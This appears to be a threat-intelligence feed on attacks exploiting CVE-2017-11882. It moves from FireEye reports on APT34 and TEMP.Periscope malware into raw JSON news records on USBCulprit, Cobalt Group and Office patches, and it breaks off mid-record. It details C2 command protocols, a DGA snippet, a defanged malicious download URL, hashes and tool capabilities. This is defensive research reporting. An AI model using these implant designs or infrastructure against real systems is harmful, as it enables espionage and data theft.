POWRUNER begins by sending a random GET request to the C2 server and waits for a response. The server will respond with either "not_now" or a random 11-digit number. If the response is a random number, POWRUNER will send another random GET request to the server and store the response in a string. POWRUNER will then check the last digit of the stored random number response, interpret the value as a command, and perform an action based on that command. The command values and the associated actions are described in Table 1.

| Command | Description | Action |
|---|---|---|
| 0 | Server response string contains batch commands | Execute batch commands and send results back to server |
| 1 | Server response string is a file path | Check for file path and upload (PUT) the file to server |
| 2 | Server response string is a file path | Check for file path and download (GET) the file |

Table 1: POWRUNER commands

After successfully executing the command, POWRUNER sends the results back to the C2 server and stops execution.

The C2 server can also send a PowerShell command to capture and store a screenshot of a victim's system. POWRUNER will send the captured screenshot image file to the C2 server if the "fileupload" command is issued. Figure 6 shows the PowerShell "Get-Screenshot" function sent by the C2 server.

Figure 6: PowerShell screenshot functionality

#### dUpdateCheckers.ps1 (BONDUPDATER)

One of the recent advancements by APT34 is the use of a DGA to generate subdomains. The BONDUPDATER script, which was named based on the hard-coded string "B007", uses a custom DGA algorithm to generate subdomains for communication with the C2 server.

#### DGA Implementation

Figure 7 provides a breakdown of how an example domain (456341921300006B0C8B2CE9C9B007.mumbai-m[.]site) is generated using BONDUPDATER's custom DGA.

Figure 7: Breakdown of subdomain created by BONDUPDATER

 1. This is a randomly generated number created using the following expression: $rnd = -join (Get-Random -InputObject (10..99) -Count (%{ Get-Random -InputObject (1..6)}));
 2. This value is either 0 or 1. It is initially set to 0. If the first resolved domain IP address starts with 24.125.X.X, then it is set to 1.
 3. Initially set to 000, then incremented by 3 after every DNS request.
 4. First 12 characters of the system UUID.
 5. "B007" hardcoded string.
 6. Hardcoded domain "mumbai-m[.]site".

BONDUPDATER will attempt to resolve the resulting DGA domain and will take the following actions based on the IP address resolution:

 1. Create a temporary file in the %temp% location.
    * The file created will have the last two octets of the resolved IP address as its filename.
 2. BONDUPDATER will evaluate the last character of the file name and perform the corresponding action found in Table 2.

| Character | Description |
|---|---|
| 0 | File contains batch commands; it executes the batch commands |
| 1 | Rename the temporary file with a .ps1 extension |
| 2 | Rename the temporary file with a .vbs extension |

Table 2: BONDUPDATER Actions

Figure 8 is a screenshot of BONDUPDATER's DGA implementation.

Figure 8: Domain Generation Algorithm

Some examples of the generated subdomains observed at time of execution include:

 * 143610035BAF04425847B007.mumbai-m[.]site
 * 835710065BAF04425847B007.mumbai-m[.]site
 * 376110095BAF04425847B007.mumbai-m[.]site

#### Network Communication

Figure 9 shows example network communications between a POWRUNER backdoor client and server.

Figure 9: Example Network Communication

In the example, the POWRUNER client sends a random GET request to the C2 server and the C2 server sends the random number (99999999990) as a response. As the response is a random number that ends with '0', POWRUNER sends another random GET request to receive an additional command string. The C2 server sends back a Base64-encoded response.

If the server had sent the string "not_now" as the response, as shown in Figure 10, POWRUNER would have ceased any further requests and terminated its execution.

Figure 10: Example "not now" server response

#### Batch Commands

POWRUNER may also receive batch commands from the C2 server to collect host information from the system. This may include information about the currently logged in user, the hostname, network configuration data, active connections, process information, local and domain administrator accounts, an enumeration of user directories, and other data. An example batch command is provided in Figure 11.

Figure 11: Batch commands sent by POWRUNER C2 server

#### Additional Use of POWRUNER / BONDUPDATER

APT34 has used POWRUNER and BONDUPDATER to target Middle East organizations as early as July 2017. In July 2017, a FireEye Web MPS appliance detected and blocked a request to retrieve and install an APT34 POWRUNER / BONDUPDATER downloader file. During the same month, FireEye observed APT34 target a separate Middle East organization using a malicious .rtf file (MD5: 63D66D99E46FB93676A4F475A65566D8) that exploited CVE-2017-0199. This file issued a GET request to download a malicious file from:

hxxp://94.23.172.164/dupdatechecker.doc

As shown in Figure 12, the script within the dupdatechecker.doc file attempts to download another file named dupdatechecker.exe from the same server. The file also contains a comment by the malware author that appears to be a taunt aimed at security researchers.

Figure 12: Contents of dupdatechecker.doc script

The dupdatechecker.exe file (MD5: C9F16F0BE8C77F0170B9B6CE876ED7FB) drops both BONDUPDATER and POWRUNER. These files connect to proxychecker[.]pro for C2.

#### Outlook and Implications

Recent activity by APT34 demonstrates that they are a capable group with potential access to their own development resources. During the past few months, APT34 has been able to quickly incorporate exploits for at least two publicly disclosed vulnerabilities (CVE-2017-0199 and CVE-2017-11882) to target organizations in the Middle East. We assess that APT34's efforts to continuously update their malware, including the incorporation of a DGA for C2, demonstrate the group's commitment to pursuing strategies to deter detection.
We expect APT34 will continue to evolve their malware and tactics as they continue to pursue access to entities in the Middle East region.

#### IOCs

Source: FireEye Threat Research, "New Targeted Attack in the Middle East by APT34, a Suspected Iranian Threat Group, Using CVE-2017-11882 Exploit", published 2017-12-07, https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html (record FIREEYE:81A95C8CF481913A870A3CEAAA7AF394; CVSS 9.3, AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/)

CVEs: CVE-2017-11882

#### Intrusions Focus on the Engineering and Maritime Sector

Since early 2018, FireEye (including our FireEye as a Service (FaaS), Mandiant Consulting, and iSIGHT Intelligence teams) has been tracking an ongoing wave of intrusions targeting engineering and maritime entities, especially those connected to South China Sea issues. The campaign is linked to a group of suspected Chinese cyber espionage actors we have tracked since 2013, dubbed TEMP.Periscope. The group has also been reported as "[Leviathan](<https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets>)" by other security firms.

The current campaign is a sharp escalation of detected activity since summer 2017.
Like multiple other Chinese cyber espionage actors, TEMP.Periscope has recently re-emerged and has been observed conducting operations with a revised toolkit. Known targets of this group have been involved in the maritime industry, as well as engineering-focused entities, and include research institutes, academic organizations, and private firms in the United States. FireEye products have robust detection for the malware used in this campaign.

#### TEMP.Periscope Background

Active since at least 2013, TEMP.Periscope has primarily focused on maritime-related targets across multiple verticals, including engineering firms, shipping and transportation, manufacturing, defense, government offices, and research universities. However, the group has also targeted professional/consulting services, high-tech industry, healthcare, and media/publishing. Identified victims were mostly found in the United States, although organizations in Europe and at least one in Hong Kong have also been affected. TEMP.Periscope overlaps in targeting, as well as tactics, techniques, and procedures (TTPs), with TEMP.Jumper, a group that also overlaps significantly with public reporting on "NanHaiShu."

#### TTPs and Malware Used

In their recent spike in activity, TEMP.Periscope has leveraged a relatively large library of malware shared with multiple other suspected Chinese groups. These tools include:

 * AIRBREAK: a JavaScript-based backdoor also reported as "Orz" that retrieves commands from hidden strings in compromised webpages and actor-controlled profiles on legitimate services.
 * BADFLICK: a backdoor that is capable of modifying the file system, generating a reverse shell, and modifying its command and control (C2) configuration.
 * PHOTO: a DLL backdoor also reported publicly as "Derusbi", capable of obtaining directory, file, and drive listings; creating a reverse shell; performing screen captures; recording video and audio; listing, terminating, and creating processes; enumerating, starting, and deleting registry keys and values; logging keystrokes; returning usernames and passwords from protected storage; and renaming, deleting, copying, moving, reading, and writing to files.
 * HOMEFRY: a 64-bit Windows password dumper/cracker that has previously been used in conjunction with the AIRBREAK and BADFLICK backdoors. Some strings are obfuscated with XOR x56. The malware accepts up to two arguments at the command line: one to display cleartext credentials for each login session, and a second to display cleartext credentials, NTLM hashes, and the malware version for each login session.
 * LUNCHMONEY: an uploader that can exfiltrate files to Dropbox.
 * MURKYTOP: a command-line reconnaissance tool. It can be used to execute files as a different user, move and delete files locally, schedule remote AT jobs, perform host discovery on connected networks, scan for open ports on hosts in a connected network, and retrieve information about the OS, users, groups, and shares on remote hosts.
 * China Chopper: a simple code injection webshell that executes Microsoft .NET code within HTTP POST commands. This allows the shell to upload and download files, execute applications with web server account permissions, list directory contents, access Active Directory, access databases, and perform any other action allowed by the .NET runtime.

The following are tools that TEMP.Periscope has leveraged in past operations and could use again, though these have not been seen in the current wave of activity:

 * Beacon: a backdoor that is commercially available as part of the Cobalt Strike software platform, commonly used for pen-testing network environments. The malware supports several capabilities, such as injecting and executing arbitrary code, uploading and downloading files, and executing shell commands.
 * [BLACKCOFFEE](<https://www.fireeye.com/blog/threat-research/2015/05/hiding_in_plain_sigh.html>): a backdoor that obfuscates its communications as normal traffic to legitimate websites such as GitHub and Microsoft's TechNet portal. Used by [APT17](<https://www2.fireeye.com/WEB-2015RPTAPT17.html>) and other Chinese cyber espionage operators.

Additional identifying TTPs include:

 * Spear phishing, including the use of probably compromised email accounts.
 * Lure documents using CVE-2017-11882 to drop malware.
 * Stolen code signing certificates used to sign malware.
 * Use of bitsadmin.exe to download additional tools.
 * Use of PowerShell to download additional tools.
 * Using C:\Windows\Debug and C:\Perflogs as staging directories.
 * Leveraging Hyperhost VPS and Proton VPN exit nodes to access webshells on internet-facing systems.
 * Using [Windows Management Instrumentation (WMI) for persistence](<https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf>).
 * Using Windows Shortcut files (.lnk) in the Startup folder that invoke the Windows Scripting Host (wscript.exe) to execute a JScript backdoor for persistence.
 * Receiving C2 instructions from user profiles created by the adversary on legitimate websites/forums such as GitHub and Microsoft's TechNet portal.

#### Implications

The current wave of identified intrusions is consistent with TEMP.Periscope and likely reflects a concerted effort to target sectors that may yield information that could provide an economic advantage, research and development data, intellectual property, or an edge in commercial negotiations.

As we continue to investigate this activity, we may identify additional data leading to greater analytical confidence linking the operation to TEMP.Periscope or other known threat actors, as well as previously unknown campaigns.

#### Indicators

| File | Hash | Description |
|---|---|---|
| x.js | 3fefa55daeb167931975c22df3eca20a | HOMEFRY, a 64-bit Windows password dumper/cracker |
| mt.exe | 40528e368d323db0ac5c3f5e1efe4889 | MURKYTOP, a command-line reconnaissance tool |
| com4.js | a68bf5fce22e7f1d6f999b7a580ae477 | AIRBREAK, a JavaScript-based backdoor which retrieves commands from hidden strings in compromised webpages |

#### Historical Indicators

| File | Hash | Description |
|---|---|---|
| green.ddd | 3eb6f85ac046a96204096ab65bbd3e7e | AIRBREAK, a JavaScript-based backdoor which retrieves commands from hidden strings in compromised webpages |
| BGij | 6e843ef4856336fe3ef4ed27a4c792b1 | Beacon, a commercially available backdoor |
| msresamn.ttf | a9e7539c1ebe857bae6efceefaa9dd16 | PHOTO, also reported as Derusbi |
| 1024-aa6a121f98330df2edee6c4391df21ff43a33604 | bd9e4c82bf12c4e7a58221fc52fed705 | BADFLICK, a backdoor that is capable of modifying the file system, generating a reverse shell, and modifying its command-and-control configuration |

Source: FireEye Threat Research, "Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries", published 2018-03-16, https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html (record FIREEYE:78657FD52E5CBE87FE2D0019439691A0; CVSS 9.3, AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/)

The Hacker News (last seen 2020-06-04; CVEs: CVE-2012-0158, CVE-2017-11882, CVE-2018-0802)

A Chinese threat actor has developed new capabilities to target air-gapped systems in an attempt to exfiltrate sensitive data for espionage, according to newly published research by Kaspersky yesterday.

The APT, known as Cycldek, Goblin Panda, or Conimes, employs an extensive toolset for lateral movement and information stealing in victim networks, including previously unreported custom tools, tactics, and procedures in attacks against government agencies in Vietnam, Thailand, and Laos.

"One of the newly revealed tools is named **USBCulprit** and has been found to rely on USB media in order to exfiltrate victim data," [Kaspersky](<https://securelist.com/cycldek-bridging-the-air-gap/97157/>) said. "This may suggest Cycldek is trying to reach air-gapped networks in victim environments or relies on physical presence for the same purpose."

First observed by [CrowdStrike](<https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-august-goblin-panda/>) in 2013, Cycldek has a long history of singling out defense, energy, and government sectors in Southeast Asia, particularly Vietnam, using decoy documents that exploit known vulnerabilities (e.g., CVE-2012-0158, CVE-2017-11882, CVE-2018-0802) in Microsoft Office to drop a malware called NewCore RAT.
\n \n\n\n## Exfiltrating Data to Removable Drives\n\n \nKaspersky's analysis of NewCore revealed two different variants (named BlueCore and RedCore) centered around two clusters of activity, with similarities in both code and infrastructure, but also contain features that are exclusive to RedCore \u2014 namely a keylogger and an RDP logger that captures details about users connected to a system via RDP. \n \n\n\n[](<https://thehackernews.com/images/-Uo7TkL_TEQg/XtirFVGHNWI/AAAAAAAAAZk/3fpINW9IErAOfGCG0T7fZGr5K9LM3BnuACLcBGAsYHQ/s728-e100/usb-virus.jpg>)\n\n \n\"Each cluster of activity had a different geographical focus,\" the researchers said. \"The operators behind the BlueCore cluster invested most of their efforts on Vietnamese targets with several outliers in Laos and Thailand, while the operators of the RedCore cluster started out with a focus on Vietnam and diverted to Laos by the end of 2018.\" \n \nBoth BlueCore and RedCore implants, in turn, downloaded a variety of additional tools to facilitate lateral movement (HDoor) and extract information (JsonCookies and ChromePass) from compromised systems. \n \nChief among them is a malware called USBCulprit that's capable of scanning a number of paths, collecting documents with specific extensions (*.pdf;*.doc;*.wps;*docx;*ppt;*.xls;*.xlsx;*.pptx;*.rtf), and exporting them to a connected USB drive. \n \n\n\n[](<https://thehackernews.com/images/-T3eT2rv9TYU/XtirEJq7SnI/AAAAAAAAAZg/x2SxjApz6oolC0VavLfhqMYUtS4eQTMcQCLcBGAsYHQ/s728-e100/usb-computer-virus.jpg>)\n\n \nWhat's more, the malware is programmed to copy itself selectively to certain removable drives so it can move laterally to other air-gapped systems each time an infected USB drive is inserted into another machine. \n \nA telemetry analysis by Kaspersky found that the first instance of the binary dates all the way back to 2014, with the latest samples recorded at the end of last year. 
\n\n\n \nThe initial infection mechanism relies on leveraging malicious binaries that mimic legitimate antivirus components to load USBCulprit in what's called [DLL search order hijacking](<https://attack.mitre.org/techniques/T1038/>) before it proceeds to collect the relevant information, save it in the form of an encrypted RAR archive, and exfiltrate the data to a connected removable device. \n \n\"The characteristics of the malware can give rise to several assumptions about its purpose and use cases, one of which is to reach and obtain data from air-gapped machines,\" the researchers said. \"This would explain the lack of any network communication in the malware and the use of only removable media as a means of transferring inbound and outbound data.\" \n \nUltimately, the similarities and differences between the two pieces of malware are indicative of the fact that the actors behind the clusters are sharing code and infrastructure, while operating as two different offshoots under a single larger entity. \n \n\"Cycldek is an example of an actor that has broader capability than publicly perceived,\" Kaspersky concluded. 
\"While most known descriptions of its activity give the impression of a marginal group with sub-par capabilities, the range of tools and timespan of operations show that the group has an extensive foothold inside the networks of high-profile targets in Southeast Asia.\"\n", "modified": "2020-06-04T08:31:39", "published": "2020-06-04T08:31:00", "id": "THN:42E3306FC75881CF8EBD30FA8291FF29", "href": "https://thehackernews.com/2020/06/air-gap-malware-usbculprit.html", "type": "thn", "title": "New USBCulprit Espionage Tool Steals Data From Air-Gapped Computers", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-27T09:17:17", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882", "CVE-2018-0802", "CVE-2018-0819", "CVE-2018-4871", "CVE-2018-0786"], "description": "[](<https://2.bp.blogspot.com/-beOJSQDFs8E/WlWzGhDEy1I/AAAAAAAAvao/HtLyZwdkdO0s6swi2W8MGUFOiL97VBjtACLcBGAs/s1600/microsoft-windows-update.png>)\n\nIf you think that only CPU updates that address this year's major security flaws\u2014[Meltdown and Spectre](<https://thehackernews.com/2018/01/meltdown-spectre-patches.html>)\u2014are the only ones you are advised to grab immediately, there are a handful of major security flaws that you should pay attention to. \n \nMicrosoft has issued its first Patch Tuesday for 2018 to address 56 CVE-listed flaws, including a zero-day vulnerability in MS Office related that had been actively exploited by several threat groups in the wild. \n \nSixteen of the security updates are listed as critical, 38 are rated important, one is rated moderate, and one is rated as low in severity. The updates address security flaws in Windows, Office, Internet Explorer, Edge, ChakraCore, ASP.NET, and the .NET Framework. 
\n \nThe zero-day vulnerability ([CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>)), described by Microsoft as a memory corruption flaw in Office, has already been targeted in the wild by several threat actor groups in the past few months. \n \nThe vulnerability, discovered by several researchers from Chinese companies Tencent and Qihoo 360, ACROS Security's 0Patch Team, and Check Point Software Technologies, can be exploited for remote code execution by tricking a targeted user into opening a specially crafted malicious Word file in MS Office or WordPad. \n \nAccording to the company, this security flaw is related to CVE-2017-11882\u2014a 17-year-old [vulnerability in the Equation Editor](<https://thehackernews.com/2017/11/microsoft-office-rce-exploit.html>) functionality (EQNEDT32.EXE), which Microsoft addressed in November. \n \nWhen researchers at 0Patch were analysing CVE-2017-11882, they discovered a new, related vulnerability (CVE-2018-0802). More details of CVE-2018-0802 can be found in a [blog post](<https://research.checkpoint.com/another-office-equation-rce-vulnerability/>) published by Check Point. \n \nBesides CVE-2018-0802, the company has addressed nine more remote code execution and memory disclosure vulnerabilities in MS Office. \n \nA spoofing vulnerability (CVE-2018-0819) in Microsoft Outlook for MAC, which has been listed as publicly disclosed ([Mailsploit attack](<https://thehackernews.com/2017/12/email-spoofing-client.html>)), has also been addressed by the company. The vulnerability does not allow some versions of Outlook for Mac to handle the encoding and display of email addresses properly, causing antivirus or anti-spam scanning not to work as intended. \n \nMicrosoft also addressed a certificate validation bypass vulnerability (CVE-2018-0786) in .NET Framework (and .NET Core) that could allow malware authors to show their invalid certificates as valid. 
\n \n\"An attacker could present a certificate that is marked invalid for a specific use, but the component uses it for that purpose,\" describes Microsoft. \"This action disregards the Enhanced Key Usage taggings.\" \n \nThe company has also patched a total of 15 vulnerabilities in the scripting engine used by Microsoft Edge and Internet Explorer. \n \nAll these flaws could be exploited for remote code execution by tricking a targeted user into opening a specially-crafted webpage that triggers a memory corruption error, though none of these has been exploited in the wild yet. \n \nMeanwhile, Adobe has [patched](<https://helpx.adobe.com/security/products/flash-player/apsb18-01.html>) a single, out of bounds read flaw (CVE-2018-4871) this month that could allow for information disclosure, though no active exploits have been seen in the wild. \n \nUsers are strongly advised to apply security patches as soon as possible to keep hackers and cybercriminals away from taking control of their computers. 
\n \nFor installing security updates, simply head on to Settings \u2192 Update & security \u2192 Windows Update \u2192 Check for updates, or you can install the updates manually.\n", "modified": "2018-01-11T07:11:17", "published": "2018-01-09T19:35:00", "id": "THN:ED087560040A02BCB1F68DE406A7F577", "href": "https://thehackernews.com/2018/01/microsoft-security-patch.html", "type": "thn", "title": "Microsoft Releases Patches for 16 Critical Flaws, Including a Zero-Day", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "threatpost": [{"lastseen": "2019-05-30T05:52:39", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882", "CVE-2017-8570", "CVE-2018-0802"], "description": "Evidence has surfaced that the Cobalt Group \u2013 the threat actors behind widespread attacks on banks and ATM jackpotting campaigns across Europe \u2013 is continuing to operate, despite the arrest of its accused ringleader in March.\n\nThe Cobalt Group, first burst on the scene in 2016: in a single night, the group stole the equivalent of over $32,000 (in local currency) from six ATMs in Eastern Europe. Throughout 2017 the group expanded its focus to financial-sector phishing schemes and new regions, including North and South America, as well as Western Europe. researchers estimated that in the first six months of 2017 Cobalt sent phishing messages with malicious attachments to over 3,000 users at 250 companies in 13 countries.\n\nIn a report [released last week](<https://www.ptsecurity.com/upload/corporate/ww-en/analytics/New-Bank-Attacks-eng.pdf>) (PDF) by Positive Technologies, researchers there said in mid-May 2018 they detected a phishing campaign directed at the financial sector that has an ultimate goal of downloading a JavaScript backdoor on target\u2019s computers. 
Researchers discovered the backdoor to be loaded up with malevolent functions, including cyberespionage and the ability to launch programs, along with the ability to update itself, remove itself and detect antivirus software. It also encrypts its communications with the C2 server with RC4. In all, its capabilities mirror the backdoor that Cobalt Group has been known to employ in the past, researchers said.\n\n\u201cAlthough [Positive Technologies] specialists did not detect use of the Cobalt Strike tool which gave the group its name, the techniques and tactics are strongly suggestive of the group\u2019s previous attacks,\u201d they noted.\n\nCobalt typically employs a number of techniques to evade user scrutiny and spam filters. The group hacks weakly protected public sites, which it uses to host malware. It sends fake messages that appear to come from financial regulators and company partners, and targets both work and personal addresses of employees. In most cases, the goal of phishing messages is to compromise bank systems used for ATM management. This enables infecting ATMs with malware that takes control of the cash dispenser. During the final stage of the attack, money mules collect cash from the hacked ATMs.\n\nThe new May campaign bore all of the hallmarks of the group beyond just the payload. For one, the phony messages were sent from a domain whose structure is identical to those previously used by the bad actors. These messages also have a link that points to a malicious document weaponized with three exploits for remote code execution in Microsoft Word (CVE-2017-8570, CVE-2017-11882 and CVE-2018-0802), generated by the Threadkit exploit kit. 
This kill chain is the same as that of a Cobalt Group campaign detected in February.\n\n\u201cCobalt relies on social engineering for the first stage of attacks, and for good reason: almost 30 percent of recipients click links in phishing messages, as our statistics show,\u201d explained Andrew Bershadsky, PT CTO, adding that in 27 percent of cases, recipients click links in phishing messages. Attackers are often able to draw employees into correspondence (and even security staff, in 3 percent of cases). And if a message is sent from the address of a real company (a technique used by Cobalt), attackers\u2019 success rate jumps to 33 percent.\n\nAs for how the rest of the May attack unfolded, PT security researchers [said](<https://www.ptsecurity.com/upload/corporate/ww-en/analytics/New-Bank-Attacks-eng.pdf>) that once one of the exploits is triggered, a BAT script runs that launches a [standard Windows utility](<https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/>) that allows bypassing AppLocker, as well as downloading and running SCT or COM objects using the standard Windows utility regsvr32.exe. The utility in turn downloads the COM-DLL-Dropper, which then fetches the backdoor.\n\nThe resurgence is notable given that the Spanish National Police [arrested](<https://www.tripwire.com/state-of-security/latest-security-news/cobalt-carbanak-malware-group-leader-arrested-spain/>) the Cobalt Group\u2019s leader (also behind the Carbanak gang) on March 26. 
EUROPOL said that the individual was responsible for helping to attack 100 financial institutions worldwide and cause more than 1 billion EUR in damages.\n", "modified": "2018-05-28T12:21:42", "published": "2018-05-28T12:21:42", "id": "THREATPOST:A79D567955CD3BD88909060ECB743C9F", "href": "https://threatpost.com/despite-ringeaders-arrest-cobalt-group-still-active/132306/", "type": "threatpost", "title": "Despite Ringleader\u2019s Arrest, Cobalt Group Still Active", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-04T07:15:20", "bulletinFamily": "info", "cvelist": ["CVE-2017-0199", "CVE-2017-11882", "CVE-2017-8570", "CVE-2018-0802"], "description": "Despite the high profile arrest earlier this year of the Cobalt Group ringleader, the threat actors behind the hacking collective are slowly ramping up their malicious behavior. In a new analysis of the threat group, known for its widespread attacks against banks in Eastern Europe over the past several years, the Cobalt Group has recently been observed updating its arsenal with a new version of the ThreadKit malware.\n\nIn a report [issued by security firm Fidelis on Tuesday](<https://www.fidelissecurity.com/sites/default/files/CobaltGroup_nov2018.pdf>) (PDF), researchers outline a number of new developments including:\n\n * Despite an arrest earlier this year of a key member, the Cobalt Group remains active.\n * A new version of the malware ThreadKit is being actively distributed in October 2018.\n * The CobInt trojan uses an XOR-based obfuscation technique.\n\n## Reemergence of Cobalt Group\n\nThe Cobalt Group first appeared in 2013 and in 2016 made a name for itself with widespread attacks on banks and ATM jackpotting campaigns across Europe. In one single campaign, it was credited for stealing over $32,000 from six Eastern European ATMs. 
In the following years the Cobalt Group expanded its focus to include financial-sector phishing schemes and new regions, including North and South America.\n\nIn March, the Cobalt Group was dealt a severe blow when the EUROPOL [announced](<https://www.europol.europa.eu/newsroom/news/mastermind-behind-eur-1-billion-cyber-bank-robbery-arrested-in-spain>) the arrest of the \u201ccriminal mastermind\u201d behind the group in Alicante, Spain. Since then, the group [was observed by Positive Technology](<https://threatpost.com/despite-ringeaders-arrest-cobalt-group-still-active/132306/>) in May as the criminals behind a spear phishing campaign directed at the financial sector that had the goal of enticing victims to download a JavaScript backdoor.\n\n\u201cIn 2017 they expanded their targets from banks to include supply chain companies, financial exchanges, investment funds, and lenders in North America, Western Europe, and South America. Tools used in 2017 included [PetrWrap](<https://threatpost.com/new-petya-distribution-vectors-bubbling-to-surface/126577/>), more_eggs, CobInt and ThreadKit,\u201d wrote Jason Reaves, principal, threat research with the Fidelis Threat Research Team in the report.\n\n**ThreadKit 2.0 **\n\nAfter the arrest of Cobalt Group\u2019s leader, in May the group was spotted changing up its tactics. To that end, the Cobalt Group began focusing on exploits used for remote code execution found in Microsoft Word ([CVE-2017-8570, CVE-2017-11882 and CVE-2018-0802](<https://threatpost.com/despite-ringeaders-arrest-cobalt-group-still-active/132306/>)) and one notably being [the now patched April 2017 zero-day bug](<https://threatpost.com/microsoft-patches-word-zero-day-spreading-dridex-malware/124906/>) ([CVE-2017-0199](<https://threatpost.com/microsoft-patches-three-vulnerabilities-under-attack/124927/>)).\n\n\u201cIn October 2018, [we] identified a new version of ThreadKit. 
As per Cobalt Group\u2019s typical methods, the malware was delivered via phishing email, containing a RFT Microsoft Office attachment which contained an evolved version of the exploit builder kit first uncovered in October 2017,\u201d according to Fidelis. \u201c[This] new version of ThreadKit [utilizes] a macro delivery framework sold and used by numerous actors and groups.\u201d\n\nFidelis\u2019 latest analysis of the ThreadKit also notes \u201ca slight evolution\u201d in the exploit kit designed to better hide from detection. Obfuscation techniques include \u201cplacing the \u2018M\u2019 from the \u2018MZ\u2019 of an executable file into it\u2019s own object and now renaming a number of the objects inside.\u201d\n\nFidelis also pointed out the update including a new download URL where the malware code \u201cobjects\u201d are downloaded from and later combined to create the executable. \u201cA few highlights from the embedded files shows a check for block.txt, which is similar to the previous version\u2019s kill-switch implementation,\u201d Reaves wrote.\n\n**CobInt Adopts New Obfuscation Skills **\n\nThe ThreadKit payload is the trojan Coblnt, a longtime favorite of the Cobalt Group. To further frustrate analysis and detection, the attackers added another layer of obfuscation, a XOR routine used to decode the initial Coblnt payload. A XOR, or XOR cipher, is an encryption algorithm that operates on a set of known principles. Encryption and decryption can be performed by applying and reapplying the XOR function.\n\n\u201cWhat\u2019s interesting here is that the XOR key is replaced by the subtraction value and the subtraction value is replaced by the previously read DWORD value. 
So the only value that\u2019s needed is the hardcoded XOR key, meaning mathematically this entire thing can be solved using a theorem prover such as Z3,\u201d researchers pointed out.\n\nThe decoded payload is the CobInt DLL, which when loaded will \u201csit in a loop beaconing to its C2 and waiting for commands and modules to be executed,\u201d according to Fidelis.\n\nFidelis and other researchers say the arrest of Cobalt group members have only temporarily slowed Carbanak/Cobalt threat actors. In a recent analysis by Kaspersky Lab, researchers said Cobalt arrests have only emboldened members and hastened the process of [splitting the groups into smaller cells](<https://securelist.com/ksb-cyberthreats-to-financial-institutions-2019-overview-and-predictions/88944/>).\n", "modified": "2018-12-11T18:40:00", "published": "2018-12-11T18:40:00", "id": "THREATPOST:55583CEEB1DA64162FA6CCA7B37CB1BB", "href": "https://threatpost.com/cobalt-threadkit-malware/139800/", "type": "threatpost", "title": "Cobalt Group Pushes Revamped ThreadKit Malware", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T22:59:18", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882"], "description": "SAN FRANCISCO\u2013The concept of threat modeling has evolved quite a lot in the last few years, moving from an activity that massive software companies such as Microsoft and Google use to anticipate and defend against potential threats to their products to something that many smaller organizations practice. Starting a threat modeling system can seem daunting, but the good news is that there\u2019s no one right way to do it, just the right way for a given organization.\n\nMicrosoft has been using some form of threat modeling internally for many years now and the company\u2019s security group has spent a lot of time speaking publicly about the benefits of the practice and advocating for wider adoption of it. 
[Adam Shostack](<https://threatpost.com/adam-shostack-science-security-and-value-thinking-differently-040709/72705>), a program manager in Microsoft\u2019s Trustworthy Computing group, has been one of the main proponents of threat modeling\u2019s use, and he said that he\u2019s reached the conclusion that threat modeling is not one defined set of methods or principles but a fluid and dynamic way of reducing security risks to products and services.\n\n\u201cI now think of threat modeling like Legos. There are things you can snap together and use what you need,\u201d he said during a talk at the RSA Conference here Wednesday. \u201cThere\u2019s no one way to threat model. The right way is the way that fixes good threats.\u201d\n\nSecurity experts often will tell developers that in order to build defensible and resilient products, they need to think like an attacker. That is, look at the product or system the way that a potential adversary would see it, find the weak spots that are ripe for exploitation and correct them. But Shostack said that isn\u2019t exactly the most useful advice.\n\n\u201cBeing told to think like an attacker is like being told to think like a professional chef,\u201d said Shostack, who recently published a new [book](<http://threatmodelingbook.com/>) on the topic, _Threat Modeling: Designing for Security_. \u201cA lot of security people like to cook, but if someone told you to go to the store and buy enough chickens for a restaurant that seats 78 people and turns over three times a night, you\u2019d have no idea what to do.\u201d\n\nAs with nearly everything in security these days, there are a number of methodologies, models, checklists and other aids designed to help organizations implement threat modeling. Those tools can be useful and have their places, Shostack said, but none of them should be seen as the perfect answer. 
Rather, use them as part of the process of putting building blocks in place as you construct a threat modeling program.\n\n\u201cWe want to focus on finding good threats. Use your assets and the actions of attackers to make threats real,\u201d he said. \u201cIt\u2019s hard to go from a checklist to a broader system. You have to think about threat modeling your software as an end-to-end process.\u201d\n\nOf course, even the best and most well-constructed threat modeling program still has to deal with the most unpredictable and dangerous threat to the product: the end user. Trying to predict how users will misuse, abuse and break a piece of software is a fool\u2019s errand, but Shostack said it\u2019s still up to the professionals to put their products in the best position to survive in today\u2019s environment.\n\n\u201cTo tell people that they can\u2019t use their computers for what they want it a battler we\u2019re going to lose over and over again,\u201d he said. \u201cPeople don\u2019t buy their computers to be secure. They buy them to watch dancing babies.\u201d\n", "modified": "2014-03-03T22:04:34", "published": "2014-02-26T14:14:34", "id": "THREATPOST:F19F70E263B2C3D2A16C72D12F9884FC", "href": "https://threatpost.com/threat-modeling-legos-and-dancing-babies/104517/", "type": "threatpost", "title": "Threat Modeling, Legos and Dancing Babies", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:01", 